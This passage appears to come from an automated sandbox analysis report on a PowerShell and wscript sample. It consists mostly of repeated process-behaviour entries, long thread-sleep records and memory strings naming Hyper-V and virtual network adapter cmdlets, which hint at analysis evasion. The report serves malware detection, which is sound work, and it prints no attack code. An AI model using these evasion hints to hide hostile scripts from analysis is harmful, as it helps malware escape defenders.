          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4501Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5147Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3564Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6212Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5230Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4519Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052Thread sleep time: -15679732462653109s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep count: 3564 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep count: 6212 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5168Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5232Thread sleep time: -12912720851596678s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4852D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4852D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4852D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4852D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.2154679290.000001C48390A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000006.00000002.3372203616.0000028A5594A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHRM
          Source: powershell.exe, 00000003.00000002.2154679290.000001C48390A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4852D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4852D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4852D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4852D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4852D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4852D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2154679290.000001C48390A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4852D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
          Source: powershell.exe, 00000000.00000002.2377549383.00000256FA04A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
